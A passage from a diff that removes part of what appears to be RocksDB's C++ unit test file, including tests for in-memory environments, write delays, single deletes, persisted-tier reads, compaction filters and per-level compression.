-      public testing::WithParamInterface<std::tuple<uint32_t, bool>> {
- public:
-  DBTestWithParam() {
-    max_subcompactions_ = std::get<0>(GetParam());
-    exclusive_manual_compaction_ = std::get<1>(GetParam());
-  }
-
-  // Required if inheriting from testing::WithParamInterface<>
-  static void SetUpTestCase() {}
-  static void TearDownTestCase() {}
-
-  uint32_t max_subcompactions_;
-  bool exclusive_manual_compaction_;
-};
-
-TEST_F(DBTest, MockEnvTest) {
-  unique_ptr<MockEnv> env{new MockEnv(Env::Default())};
-  Options options;
-  options.create_if_missing = true;
-  options.env = env.get();
-  DB* db;
-
-  const Slice keys[] = {Slice("aaa"), Slice("bbb"), Slice("ccc")};
-  const Slice vals[] = {Slice("foo"), Slice("bar"), Slice("baz")};
-
-  ASSERT_OK(DB::Open(options, "/dir/db", &db));
-  for (size_t i = 0; i < 3; ++i) {
-    ASSERT_OK(db->Put(WriteOptions(), keys[i], vals[i]));
-  }
-
-  for (size_t i = 0; i < 3; ++i) {
-    std::string res;
-    ASSERT_OK(db->Get(ReadOptions(), keys[i], &res));
-    ASSERT_TRUE(res == vals[i]);
-  }
-
-  Iterator* iterator = db->NewIterator(ReadOptions());
-  iterator->SeekToFirst();
-  for (size_t i = 0; i < 3; ++i) {
-    ASSERT_TRUE(iterator->Valid());
-    ASSERT_TRUE(keys[i] == iterator->key());
-    ASSERT_TRUE(vals[i] == iterator->value());
-    iterator->Next();
-  }
-  ASSERT_TRUE(!iterator->Valid());
-  delete iterator;
-
-// TEST_FlushMemTable() is not supported in ROCKSDB_LITE
-#ifndef ROCKSDB_LITE
-  DBImpl* dbi = reinterpret_cast<DBImpl*>(db);
-  ASSERT_OK(dbi->TEST_FlushMemTable());
-
-  for (size_t i = 0; i < 3; ++i) {
-    std::string res;
-    ASSERT_OK(db->Get(ReadOptions(), keys[i], &res));
-    ASSERT_TRUE(res == vals[i]);
-  }
-#endif  // ROCKSDB_LITE
-
-  delete db;
-}
-
-// NewMemEnv returns nullptr in ROCKSDB_LITE since class InMemoryEnv isn't
-// defined.
-#ifndef ROCKSDB_LITE
-TEST_F(DBTest, MemEnvTest) {
-  unique_ptr<Env> env{NewMemEnv(Env::Default())};
-  Options options;
-  options.create_if_missing = true;
-  options.env = env.get();
-  DB* db;
-
-  const Slice keys[] = {Slice("aaa"), Slice("bbb"), Slice("ccc")};
-  const Slice vals[] = {Slice("foo"), Slice("bar"), Slice("baz")};
-
-  ASSERT_OK(DB::Open(options, "/dir/db", &db));
-  for (size_t i = 0; i < 3; ++i) {
-    ASSERT_OK(db->Put(WriteOptions(), keys[i], vals[i]));
-  }
-
-  for (size_t i = 0; i < 3; ++i) {
-    std::string res;
-    ASSERT_OK(db->Get(ReadOptions(), keys[i], &res));
-    ASSERT_TRUE(res == vals[i]);
-  }
-
-  Iterator* iterator = db->NewIterator(ReadOptions());
-  iterator->SeekToFirst();
-  for (size_t i = 0; i < 3; ++i) {
-    ASSERT_TRUE(iterator->Valid());
-    ASSERT_TRUE(keys[i] == iterator->key());
-    ASSERT_TRUE(vals[i] == iterator->value());
-    iterator->Next();
-  }
-  ASSERT_TRUE(!iterator->Valid());
-  delete iterator;
-
-  DBImpl* dbi = reinterpret_cast<DBImpl*>(db);
-  ASSERT_OK(dbi->TEST_FlushMemTable());
-
-  for (size_t i = 0; i < 3; ++i) {
-    std::string res;
-    ASSERT_OK(db->Get(ReadOptions(), keys[i], &res));
-    ASSERT_TRUE(res == vals[i]);
-  }
-
-  delete db;
-
-  options.create_if_missing = false;
-  ASSERT_OK(DB::Open(options, "/dir/db", &db));
-  for (size_t i = 0; i < 3; ++i) {
-    std::string res;
-    ASSERT_OK(db->Get(ReadOptions(), keys[i], &res));
-    ASSERT_TRUE(res == vals[i]);
-  }
-  delete db;
-}
-#endif  // ROCKSDB_LITE
-
-TEST_F(DBTest, WriteEmptyBatch) {
-  Options options = CurrentOptions();
-  options.env = env_;
-  options.write_buffer_size = 100000;
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  ASSERT_OK(Put(1, "foo", "bar"));
-  WriteOptions wo;
-  wo.sync = true;
-  wo.disableWAL = false;
-  WriteBatch empty_batch;
-  ASSERT_OK(dbfull()->Write(wo, &empty_batch));
-
-  // make sure we can re-open it.
-  ASSERT_OK(TryReopenWithColumnFamilies({"default", "pikachu"}, options));
-  ASSERT_EQ("bar", Get(1, "foo"));
-}
-
-TEST_F(DBTest, SkipDelay) {
-  Options options = CurrentOptions();
-  options.env = env_;
-  options.write_buffer_size = 100000;
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  for (bool sync : {true, false}) {
-    for (bool disableWAL : {true, false}) {
-      // Use a small number to ensure a large delay that is still effective
-      // when we do Put
-      // TODO(myabandeh): this is time dependent and could potentially make
-      // the test flaky
-      auto token = dbfull()->TEST_write_controler().GetDelayToken(1);
-      std::atomic<int> sleep_count(0);
-      rocksdb::SyncPoint::GetInstance()->SetCallBack(
-          "DBImpl::DelayWrite:Sleep",
-          [&](void* arg) { sleep_count.fetch_add(1); });
-      std::atomic<int> wait_count(0);
-      rocksdb::SyncPoint::GetInstance()->SetCallBack(
-          "DBImpl::DelayWrite:Wait",
-          [&](void* arg) { wait_count.fetch_add(1); });
-      rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-      WriteOptions wo;
-      wo.sync = sync;
-      wo.disableWAL = disableWAL;
-      wo.no_slowdown = true;
-      dbfull()->Put(wo, "foo", "bar");
-      // We need the 2nd write to trigger delay. This is because delay is
-      // estimated based on the last write size which is 0 for the first write.
-      ASSERT_NOK(dbfull()->Put(wo, "foo2", "bar2"));
-      ASSERT_GE(sleep_count.load(), 0);
-      ASSERT_GE(wait_count.load(), 0);
-      token.reset();
-
-      token = dbfull()->TEST_write_controler().GetDelayToken(1000000000);
-      wo.no_slowdown = false;
-      ASSERT_OK(dbfull()->Put(wo, "foo3", "bar3"));
-      ASSERT_GE(sleep_count.load(), 1);
-      token.reset();
-    }
-  }
-}
-
-#ifndef ROCKSDB_LITE
-
-TEST_F(DBTest, LevelLimitReopen) {
-  Options options = CurrentOptions();
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  const std::string value(1024 * 1024, ' ');
-  int i = 0;
-  while (NumTableFilesAtLevel(2, 1) == 0) {
-    ASSERT_OK(Put(1, Key(i++), value));
-  }
-
-  options.num_levels = 1;
-  options.max_bytes_for_level_multiplier_additional.resize(1, 1);
-  Status s = TryReopenWithColumnFamilies({"default", "pikachu"}, options);
-  ASSERT_EQ(s.IsInvalidArgument(), true);
-  ASSERT_EQ(s.ToString(),
-            "Invalid argument: db has more levels than options.num_levels");
-
-  options.num_levels = 10;
-  options.max_bytes_for_level_multiplier_additional.resize(10, 1);
-  ASSERT_OK(TryReopenWithColumnFamilies({"default", "pikachu"}, options));
-}
-#endif  // ROCKSDB_LITE
-
-
-TEST_F(DBTest, PutSingleDeleteGet) {
-  do {
-    CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-    ASSERT_OK(Put(1, "foo", "v1"));
-    ASSERT_EQ("v1", Get(1, "foo"));
-    ASSERT_OK(Put(1, "foo2", "v2"));
-    ASSERT_EQ("v2", Get(1, "foo2"));
-    ASSERT_OK(SingleDelete(1, "foo"));
-    ASSERT_EQ("NOT_FOUND", Get(1, "foo"));
-    // Skip HashCuckooRep as it does not support single delete. FIFO and
-    // universal compaction do not apply to the test case. Skip MergePut
-    // because single delete does not get removed when it encounters a merge.
-  } while (ChangeOptions(kSkipHashCuckoo | kSkipFIFOCompaction |
-                         kSkipUniversalCompaction | kSkipMergePut));
-}
-
-TEST_F(DBTest, ReadFromPersistedTier) {
-  do {
-    Random rnd(301);
-    Options options = CurrentOptions();
-    for (int disableWAL = 0; disableWAL <= 1; ++disableWAL) {
-      CreateAndReopenWithCF({"pikachu"}, options);
-      WriteOptions wopt;
-      wopt.disableWAL = (disableWAL == 1);
-      // 1st round: put but not flush
-      ASSERT_OK(db_->Put(wopt, handles_[1], "foo", "first"));
-      ASSERT_OK(db_->Put(wopt, handles_[1], "bar", "one"));
-      ASSERT_EQ("first", Get(1, "foo"));
-      ASSERT_EQ("one", Get(1, "bar"));
-
-      // Read directly from persited data.
-      ReadOptions ropt;
-      ropt.read_tier = kPersistedTier;
-      std::string value;
-      if (wopt.disableWAL) {
-        // as data has not yet being flushed, we expect not found.
-        ASSERT_TRUE(db_->Get(ropt, handles_[1], "foo", &value).IsNotFound());
-        ASSERT_TRUE(db_->Get(ropt, handles_[1], "bar", &value).IsNotFound());
-      } else {
-        ASSERT_OK(db_->Get(ropt, handles_[1], "foo", &value));
-        ASSERT_OK(db_->Get(ropt, handles_[1], "bar", &value));
-      }
-
-      // Multiget
-      std::vector<ColumnFamilyHandle*> multiget_cfs;
-      multiget_cfs.push_back(handles_[1]);
-      multiget_cfs.push_back(handles_[1]);
-      std::vector<Slice> multiget_keys;
-      multiget_keys.push_back("foo");
-      multiget_keys.push_back("bar");
-      std::vector<std::string> multiget_values;
-      auto statuses =
-          db_->MultiGet(ropt, multiget_cfs, multiget_keys, &multiget_values);
-      if (wopt.disableWAL) {
-        ASSERT_TRUE(statuses[0].IsNotFound());
-        ASSERT_TRUE(statuses[1].IsNotFound());
-      } else {
-        ASSERT_OK(statuses[0]);
-        ASSERT_OK(statuses[1]);
-      }
-
-      // 2nd round: flush and put a new value in memtable.
-      ASSERT_OK(Flush(1));
-      ASSERT_OK(db_->Put(wopt, handles_[1], "rocksdb", "hello"));
-
-      // once the data has been flushed, we are able to get the
-      // data when kPersistedTier is used.
-      ASSERT_TRUE(db_->Get(ropt, handles_[1], "foo", &value).ok());
-      ASSERT_EQ(value, "first");
-      ASSERT_TRUE(db_->Get(ropt, handles_[1], "bar", &value).ok());
-      ASSERT_EQ(value, "one");
-      if (wopt.disableWAL) {
-        ASSERT_TRUE(
-            db_->Get(ropt, handles_[1], "rocksdb", &value).IsNotFound());
-      } else {
-        ASSERT_OK(db_->Get(ropt, handles_[1], "rocksdb", &value));
-        ASSERT_EQ(value, "hello");
-      }
-
-      // Expect same result in multiget
-      multiget_cfs.push_back(handles_[1]);
-      multiget_keys.push_back("rocksdb");
-      statuses =
-          db_->MultiGet(ropt, multiget_cfs, multiget_keys, &multiget_values);
-      ASSERT_TRUE(statuses[0].ok());
-      ASSERT_EQ("first", multiget_values[0]);
-      ASSERT_TRUE(statuses[1].ok());
-      ASSERT_EQ("one", multiget_values[1]);
-      if (wopt.disableWAL) {
-        ASSERT_TRUE(statuses[2].IsNotFound());
-      } else {
-        ASSERT_OK(statuses[2]);
-      }
-
-      // 3rd round: delete and flush
-      ASSERT_OK(db_->Delete(wopt, handles_[1], "foo"));
-      Flush(1);
-      ASSERT_OK(db_->Delete(wopt, handles_[1], "bar"));
-
-      ASSERT_TRUE(db_->Get(ropt, handles_[1], "foo", &value).IsNotFound());
-      if (wopt.disableWAL) {
-        // Still expect finding the value as its delete has not yet being
-        // flushed.
-        ASSERT_TRUE(db_->Get(ropt, handles_[1], "bar", &value).ok());
-        ASSERT_EQ(value, "one");
-      } else {
-        ASSERT_TRUE(db_->Get(ropt, handles_[1], "bar", &value).IsNotFound());
-      }
-      ASSERT_TRUE(db_->Get(ropt, handles_[1], "rocksdb", &value).ok());
-      ASSERT_EQ(value, "hello");
-
-      statuses =
-          db_->MultiGet(ropt, multiget_cfs, multiget_keys, &multiget_values);
-      ASSERT_TRUE(statuses[0].IsNotFound());
-      if (wopt.disableWAL) {
-        ASSERT_TRUE(statuses[1].ok());
-        ASSERT_EQ("one", multiget_values[1]);
-      } else {
-        ASSERT_TRUE(statuses[1].IsNotFound());
-      }
-      ASSERT_TRUE(statuses[2].ok());
-      ASSERT_EQ("hello", multiget_values[2]);
-      if (wopt.disableWAL == 0) {
-        DestroyAndReopen(options);
-      }
-    }
-  } while (ChangeOptions(kSkipHashCuckoo));
-}
-
-TEST_F(DBTest, SingleDeleteFlush) {
-  // Test to check whether flushing preserves a single delete hidden
-  // behind a put.
-  do {
-    Random rnd(301);
-
-    Options options = CurrentOptions();
-    options.disable_auto_compactions = true;
-    CreateAndReopenWithCF({"pikachu"}, options);
-
-    // Put values on second level (so that they will not be in the same
-    // compaction as the other operations.
-    Put(1, "foo", "first");
-    Put(1, "bar", "one");
-    ASSERT_OK(Flush(1));
-    MoveFilesToLevel(2, 1);
-
-    // (Single) delete hidden by a put
-    SingleDelete(1, "foo");
-    Put(1, "foo", "second");
-    Delete(1, "bar");
-    Put(1, "bar", "two");
-    ASSERT_OK(Flush(1));
-
-    SingleDelete(1, "foo");
-    Delete(1, "bar");
-    ASSERT_OK(Flush(1));
-
-    dbfull()->CompactRange(CompactRangeOptions(), handles_[1], nullptr,
-                           nullptr);
-
-    ASSERT_EQ("NOT_FOUND", Get(1, "bar"));
-    ASSERT_EQ("NOT_FOUND", Get(1, "foo"));
-    // Skip HashCuckooRep as it does not support single delete. FIFO and
-    // universal compaction do not apply to the test case. Skip MergePut
-    // because merges cannot be combined with single deletions.
-  } while (ChangeOptions(kSkipHashCuckoo | kSkipFIFOCompaction |
-                         kSkipUniversalCompaction | kSkipMergePut));
-}
-
-TEST_F(DBTest, SingleDeletePutFlush) {
-  // Single deletes that encounter the matching put in a flush should get
-  // removed.
-  do {
-    Random rnd(301);
-
-    Options options = CurrentOptions();
-    options.disable_auto_compactions = true;
-    CreateAndReopenWithCF({"pikachu"}, options);
-
-    Put(1, "foo", Slice());
-    Put(1, "a", Slice());
-    SingleDelete(1, "a");
-    ASSERT_OK(Flush(1));
-
-    ASSERT_EQ("[ ]", AllEntriesFor("a", 1));
-    // Skip HashCuckooRep as it does not support single delete. FIFO and
-    // universal compaction do not apply to the test case. Skip MergePut
-    // because merges cannot be combined with single deletions.
-  } while (ChangeOptions(kSkipHashCuckoo | kSkipFIFOCompaction |
-                         kSkipUniversalCompaction | kSkipMergePut));
-}
-
-// Disable because not all platform can run it.
-// It requires more than 9GB memory to run it, With single allocation
-// of more than 3GB.
-TEST_F(DBTest, DISABLED_VeryLargeValue) {
-  const size_t kValueSize = 3221225472u;  // 3GB value
-  const size_t kKeySize = 8388608u;       // 8MB key
-  std::string raw(kValueSize, 'v');
-  std::string key1(kKeySize, 'c');
-  std::string key2(kKeySize, 'd');
-
-  Options options = CurrentOptions();
-  options.env = env_;
-  options.write_buffer_size = 100000;  // Small write buffer
-  options.paranoid_checks = true;
-  DestroyAndReopen(options);
-
-  ASSERT_OK(Put("boo", "v1"));
-  ASSERT_OK(Put("foo", "v1"));
-  ASSERT_OK(Put(key1, raw));
-  raw[0] = 'w';
-  ASSERT_OK(Put(key2, raw));
-  dbfull()->TEST_WaitForFlushMemTable();
-
-  ASSERT_EQ(1, NumTableFilesAtLevel(0));
-
-  std::string value;
-  Status s = db_->Get(ReadOptions(), key1, &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(kValueSize, value.size());
-  ASSERT_EQ('v', value[0]);
-
-  s = db_->Get(ReadOptions(), key2, &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(kValueSize, value.size());
-  ASSERT_EQ('w', value[0]);
-
-  // Compact all files.
-  Flush();
-  db_->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-
-  // Check DB is not in read-only state.
-  ASSERT_OK(Put("boo", "v1"));
-
-  s = db_->Get(ReadOptions(), key1, &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(kValueSize, value.size());
-  ASSERT_EQ('v', value[0]);
-
-  s = db_->Get(ReadOptions(), key2, &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(kValueSize, value.size());
-  ASSERT_EQ('w', value[0]);
-}
-
-TEST_F(DBTest, GetFromImmutableLayer) {
-  do {
-    Options options = CurrentOptions();
-    options.env = env_;
-    CreateAndReopenWithCF({"pikachu"}, options);
-
-    ASSERT_OK(Put(1, "foo", "v1"));
-    ASSERT_EQ("v1", Get(1, "foo"));
-
-    // Block sync calls
-    env_->delay_sstable_sync_.store(true, std::memory_order_release);
-    Put(1, "k1", std::string(100000, 'x'));  // Fill memtable
-    Put(1, "k2", std::string(100000, 'y'));  // Trigger flush
-    ASSERT_EQ("v1", Get(1, "foo"));
-    ASSERT_EQ("NOT_FOUND", Get(0, "foo"));
-    // Release sync calls
-    env_->delay_sstable_sync_.store(false, std::memory_order_release);
-  } while (ChangeOptions());
-}
-
-
-TEST_F(DBTest, GetLevel0Ordering) {
-  do {
-    CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-    // Check that we process level-0 files in correct order.  The code
-    // below generates two level-0 files where the earlier one comes
-    // before the later one in the level-0 file list since the earlier
-    // one has a smaller "smallest" key.
-    ASSERT_OK(Put(1, "bar", "b"));
-    ASSERT_OK(Put(1, "foo", "v1"));
-    ASSERT_OK(Flush(1));
-    ASSERT_OK(Put(1, "foo", "v2"));
-    ASSERT_OK(Flush(1));
-    ASSERT_EQ("v2", Get(1, "foo"));
-  } while (ChangeOptions());
-}
-
-TEST_F(DBTest, WrongLevel0Config) {
-  Options options = CurrentOptions();
-  Close();
-  ASSERT_OK(DestroyDB(dbname_, options));
-  options.level0_stop_writes_trigger = 1;
-  options.level0_slowdown_writes_trigger = 2;
-  options.level0_file_num_compaction_trigger = 3;
-  ASSERT_OK(DB::Open(options, dbname_, &db_));
-}
-
-#ifndef ROCKSDB_LITE
-TEST_F(DBTest, GetOrderedByLevels) {
-  do {
-    CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-    ASSERT_OK(Put(1, "foo", "v1"));
-    Compact(1, "a", "z");
-    ASSERT_EQ("v1", Get(1, "foo"));
-    ASSERT_OK(Put(1, "foo", "v2"));
-    ASSERT_EQ("v2", Get(1, "foo"));
-    ASSERT_OK(Flush(1));
-    ASSERT_EQ("v2", Get(1, "foo"));
-  } while (ChangeOptions());
-}
-
-TEST_F(DBTest, GetPicksCorrectFile) {
-  do {
-    CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-    // Arrange to have multiple files in a non-level-0 level.
-    ASSERT_OK(Put(1, "a", "va"));
-    Compact(1, "a", "b");
-    ASSERT_OK(Put(1, "x", "vx"));
-    Compact(1, "x", "y");
-    ASSERT_OK(Put(1, "f", "vf"));
-    Compact(1, "f", "g");
-    ASSERT_EQ("va", Get(1, "a"));
-    ASSERT_EQ("vf", Get(1, "f"));
-    ASSERT_EQ("vx", Get(1, "x"));
-  } while (ChangeOptions());
-}
-
-TEST_F(DBTest, GetEncountersEmptyLevel) {
-  do {
-    Options options = CurrentOptions();
-    CreateAndReopenWithCF({"pikachu"}, options);
-    // Arrange for the following to happen:
-    //   * sstable A in level 0
-    //   * nothing in level 1
-    //   * sstable B in level 2
-    // Then do enough Get() calls to arrange for an automatic compaction
-    // of sstable A.  A bug would cause the compaction to be marked as
-    // occurring at level 1 (instead of the correct level 0).
-
-    // Step 1: First place sstables in levels 0 and 2
-    Put(1, "a", "begin");
-    Put(1, "z", "end");
-    ASSERT_OK(Flush(1));
-    dbfull()->TEST_CompactRange(0, nullptr, nullptr, handles_[1]);
-    dbfull()->TEST_CompactRange(1, nullptr, nullptr, handles_[1]);
-    Put(1, "a", "begin");
-    Put(1, "z", "end");
-    ASSERT_OK(Flush(1));
-    ASSERT_GT(NumTableFilesAtLevel(0, 1), 0);
-    ASSERT_GT(NumTableFilesAtLevel(2, 1), 0);
-
-    // Step 2: clear level 1 if necessary.
-    dbfull()->TEST_CompactRange(1, nullptr, nullptr, handles_[1]);
-    ASSERT_EQ(NumTableFilesAtLevel(0, 1), 1);
-    ASSERT_EQ(NumTableFilesAtLevel(1, 1), 0);
-    ASSERT_EQ(NumTableFilesAtLevel(2, 1), 1);
-
-    // Step 3: read a bunch of times
-    for (int i = 0; i < 1000; i++) {
-      ASSERT_EQ("NOT_FOUND", Get(1, "missing"));
-    }
-
-    // Step 4: Wait for compaction to finish
-    dbfull()->TEST_WaitForCompact();
-
-    ASSERT_EQ(NumTableFilesAtLevel(0, 1), 1);  // XXX
-  } while (ChangeOptions(kSkipUniversalCompaction | kSkipFIFOCompaction));
-}
-#endif  // ROCKSDB_LITE
-
-TEST_F(DBTest, FlushMultipleMemtable) {
-  do {
-    Options options = CurrentOptions();
-    WriteOptions writeOpt = WriteOptions();
-    writeOpt.disableWAL = true;
-    options.max_write_buffer_number = 4;
-    options.min_write_buffer_number_to_merge = 3;
-    options.max_write_buffer_number_to_maintain = -1;
-    CreateAndReopenWithCF({"pikachu"}, options);
-    ASSERT_OK(dbfull()->Put(writeOpt, handles_[1], "foo", "v1"));
-    ASSERT_OK(Flush(1));
-    ASSERT_OK(dbfull()->Put(writeOpt, handles_[1], "bar", "v1"));
-
-    ASSERT_EQ("v1", Get(1, "foo"));
-    ASSERT_EQ("v1", Get(1, "bar"));
-    ASSERT_OK(Flush(1));
-  } while (ChangeCompactOptions());
-}
-#ifndef ROCKSDB_LITE
-TEST_F(DBTest, FlushSchedule) {
-  Options options = CurrentOptions();
-  options.disable_auto_compactions = true;
-  options.level0_stop_writes_trigger = 1 << 10;
-  options.level0_slowdown_writes_trigger = 1 << 10;
-  options.min_write_buffer_number_to_merge = 1;
-  options.max_write_buffer_number_to_maintain = 1;
-  options.max_write_buffer_number = 2;
-  options.write_buffer_size = 120 * 1024;
-  CreateAndReopenWithCF({"pikachu"}, options);
-  std::vector<port::Thread> threads;
-
-  std::atomic<int> thread_num(0);
-  // each column family will have 5 thread, each thread generating 2 memtables.
-  // each column family should end up with 10 table files
-  std::function<void()> fill_memtable_func = [&]() {
-    int a = thread_num.fetch_add(1);
-    Random rnd(a);
-    WriteOptions wo;
-    // this should fill up 2 memtables
-    for (int k = 0; k < 5000; ++k) {
-      ASSERT_OK(db_->Put(wo, handles_[a & 1], RandomString(&rnd, 13), ""));
-    }
-  };
-
-  for (int i = 0; i < 10; ++i) {
-    threads.emplace_back(fill_memtable_func);
-  }
-
-  for (auto& t : threads) {
-    t.join();
-  }
-
-  auto default_tables = GetNumberOfSstFilesForColumnFamily(db_, "default");
-  auto pikachu_tables = GetNumberOfSstFilesForColumnFamily(db_, "pikachu");
-  ASSERT_LE(default_tables, static_cast<uint64_t>(10));
-  ASSERT_GT(default_tables, static_cast<uint64_t>(0));
-  ASSERT_LE(pikachu_tables, static_cast<uint64_t>(10));
-  ASSERT_GT(pikachu_tables, static_cast<uint64_t>(0));
-}
-#endif  // ROCKSDB_LITE
-
-namespace {
-class KeepFilter : public CompactionFilter {
- public:
-  virtual bool Filter(int level, const Slice& key, const Slice& value,
-                      std::string* new_value,
-                      bool* value_changed) const override {
-    return false;
-  }
-
-  virtual const char* Name() const override { return "KeepFilter"; }
-};
-
-class KeepFilterFactory : public CompactionFilterFactory {
- public:
-  explicit KeepFilterFactory(bool check_context = false)
-      : check_context_(check_context) {}
-
-  virtual std::unique_ptr<CompactionFilter> CreateCompactionFilter(
-      const CompactionFilter::Context& context) override {
-    if (check_context_) {
-      EXPECT_EQ(expect_full_compaction_.load(), context.is_full_compaction);
-      EXPECT_EQ(expect_manual_compaction_.load(), context.is_manual_compaction);
-    }
-    return std::unique_ptr<CompactionFilter>(new KeepFilter());
-  }
-
-  virtual const char* Name() const override { return "KeepFilterFactory"; }
-  bool check_context_;
-  std::atomic_bool expect_full_compaction_;
-  std::atomic_bool expect_manual_compaction_;
-};
-
-class DelayFilter : public CompactionFilter {
- public:
-  explicit DelayFilter(DBTestBase* d) : db_test(d) {}
-  virtual bool Filter(int level, const Slice& key, const Slice& value,
-                      std::string* new_value,
-                      bool* value_changed) const override {
-    db_test->env_->addon_time_.fetch_add(1000);
-    return true;
-  }
-
-  virtual const char* Name() const override { return "DelayFilter"; }
-
- private:
-  DBTestBase* db_test;
-};
-
-class DelayFilterFactory : public CompactionFilterFactory {
- public:
-  explicit DelayFilterFactory(DBTestBase* d) : db_test(d) {}
-  virtual std::unique_ptr<CompactionFilter> CreateCompactionFilter(
-      const CompactionFilter::Context& context) override {
-    return std::unique_ptr<CompactionFilter>(new DelayFilter(db_test));
-  }
-
-  virtual const char* Name() const override { return "DelayFilterFactory"; }
-
- private:
-  DBTestBase* db_test;
-};
-}  // namespace
-
-#ifndef ROCKSDB_LITE
-
-static std::string CompressibleString(Random* rnd, int len) {
-  std::string r;
-  test::CompressibleString(rnd, 0.8, len, &r);
-  return r;
-}
-#endif  // ROCKSDB_LITE
-
-TEST_F(DBTest, FailMoreDbPaths) {
-  Options options = CurrentOptions();
-  options.db_paths.emplace_back(dbname_, 10000000);
-  options.db_paths.emplace_back(dbname_ + "_2", 1000000);
-  options.db_paths.emplace_back(dbname_ + "_3", 1000000);
-  options.db_paths.emplace_back(dbname_ + "_4", 1000000);
-  options.db_paths.emplace_back(dbname_ + "_5", 1000000);
-  ASSERT_TRUE(TryReopen(options).IsNotSupported());
-}
-
-void CheckColumnFamilyMeta(const ColumnFamilyMetaData& cf_meta) {
-  uint64_t cf_size = 0;
-  uint64_t cf_csize = 0;
-  size_t file_count = 0;
-  for (auto level_meta : cf_meta.levels) {
-    uint64_t level_size = 0;
-    uint64_t level_csize = 0;
-    file_count += level_meta.files.size();
-    for (auto file_meta : level_meta.files) {
-      level_size += file_meta.size;
-    }
-    ASSERT_EQ(level_meta.size, level_size);
-    cf_size += level_size;
-    cf_csize += level_csize;
-  }
-  ASSERT_EQ(cf_meta.file_count, file_count);
-  ASSERT_EQ(cf_meta.size, cf_size);
-}
-
-#ifndef ROCKSDB_LITE
-TEST_F(DBTest, ColumnFamilyMetaDataTest) {
-  Options options = CurrentOptions();
-  options.create_if_missing = true;
-  DestroyAndReopen(options);
-
-  Random rnd(301);
-  int key_index = 0;
-  ColumnFamilyMetaData cf_meta;
-  for (int i = 0; i < 100; ++i) {
-    GenerateNewFile(&rnd, &key_index);
-    db_->GetColumnFamilyMetaData(&cf_meta);
-    CheckColumnFamilyMeta(cf_meta);
-  }
-}
-
-namespace {
-void MinLevelHelper(DBTest* self, Options& options) {
-  Random rnd(301);
-
-  for (int num = 0; num < options.level0_file_num_compaction_trigger - 1;
-       num++) {
-    std::vector<std::string> values;
-    // Write 120KB (12 values, each 10K)
-    for (int i = 0; i < 12; i++) {
-      values.push_back(DBTestBase::RandomString(&rnd, 10000));
-      ASSERT_OK(self->Put(DBTestBase::Key(i), values[i]));
-    }
-    self->dbfull()->TEST_WaitForFlushMemTable();
-    ASSERT_EQ(self->NumTableFilesAtLevel(0), num + 1);
-  }
-
-  // generate one more file in level-0, and should trigger level-0 compaction
-  std::vector<std::string> values;
-  for (int i = 0; i < 12; i++) {
-    values.push_back(DBTestBase::RandomString(&rnd, 10000));
-    ASSERT_OK(self->Put(DBTestBase::Key(i), values[i]));
-  }
-  self->dbfull()->TEST_WaitForCompact();
-
-  ASSERT_EQ(self->NumTableFilesAtLevel(0), 0);
-  ASSERT_EQ(self->NumTableFilesAtLevel(1), 1);
-}
-
-// returns false if the calling-Test should be skipped
-bool MinLevelToCompress(CompressionType& type, Options& options, int wbits,
-                        int lev, int strategy) {
-  fprintf(stderr,
-          "Test with compression options : window_bits = %d, level =  %d, "
-          "strategy = %d}\n",
-          wbits, lev, strategy);
-  options.write_buffer_size = 100 << 10;  // 100KB
-  options.arena_block_size = 4096;
-  options.num_levels = 3;
-  options.level0_file_num_compaction_trigger = 3;
-  options.create_if_missing = true;
-
-  if (Snappy_Supported()) {
-    type = kSnappyCompression;
-    fprintf(stderr, "using snappy\n");
-  } else if (Zlib_Supported()) {
-    type = kZlibCompression;
-    fprintf(stderr, "using zlib\n");
-  } else if (BZip2_Supported()) {
-    type = kBZip2Compression;
-    fprintf(stderr, "using bzip2\n");
-  } else if (LZ4_Supported()) {
-    type = kLZ4Compression;
-    fprintf(stderr, "using lz4\n");
-  } else if (XPRESS_Supported()) {
-    type = kXpressCompression;
-    fprintf(stderr, "using xpress\n");
-  } else if (ZSTD_Supported()) {
-    type = kZSTD;
-    fprintf(stderr, "using ZSTD\n");
-  } else {
-    fprintf(stderr, "skipping test, compression disabled\n");
-    return false;
-  }
-  options.compression_per_level.resize(options.num_levels);
-
-  // do not compress L0
-  for (int i = 0; i < 1; i++) {
-    options.compression_per_level[i] = kNoCompression;
-  }
-  for (int i = 1; i < options.num_levels; i++) {
-    options.compression_per_level[i] = type;
-  }
-  return true;
-}
-}  // namespace
-
-TEST_F(DBTest, MinLevelToCompress1) {
-  Options options = CurrentOptions();
-  CompressionType type = kSnappyCompression;
-  if (!MinLevelToCompress(type, options, -14, -1, 0)) {
-    return;
-  }
-  Reopen(options);
-  MinLevelHelper(this, options);
-
-  // do not compress L0 and L1
-  for (int i = 0; i < 2; i++) {
-    options.compression_per_level[i] = kNoCompression;
-  }
-  for (int i = 2; i < options.num_levels; i++) {
-    options.compression_per_level[i] = type;
-  }
-  DestroyAndReopen(options);
-  MinLevelHelper(this, options);
-}
-
-TEST_F(DBTest, MinLevelToCompress2) {
-  Options options = CurrentOptions();
-  CompressionType type = kSnappyCompression;
-  if (!MinLevelToCompress(type, options, 15, -1, 0)) {
-    return;
-  }
-  Reopen(options);
-  MinLevelHelper(this, options);
-
-  // do not compress L0 and L1
-  for (int i = 0; i < 2; i++) {
-    options.compression_per_level[i] = kNoCompression;
-  }
-  for (int i = 2; i < options.num_levels; i++) {
-    options.compression_per_level[i] = type;
-  }
-  DestroyAndReopen(options);
-  MinLevelHelper(this, options);
-}
-
-// This test may fail because of a legit case that multiple L0 files
-// are trivial moved to L1.
-TEST_F(DBTest, DISABLED_RepeatedWritesToSameKey) {
-  do {
-    Options options = CurrentOptions();
-    options.env = env_;
-    options.write_buffer_size = 100000;  // Small write buffer
-    CreateAndReopenWithCF({"pikachu"}, options);
-
-    // We must have at most one file per level except for level-0,
-    // which may have up to kL0_StopWritesTrigger files.
-    const int kMaxFiles =
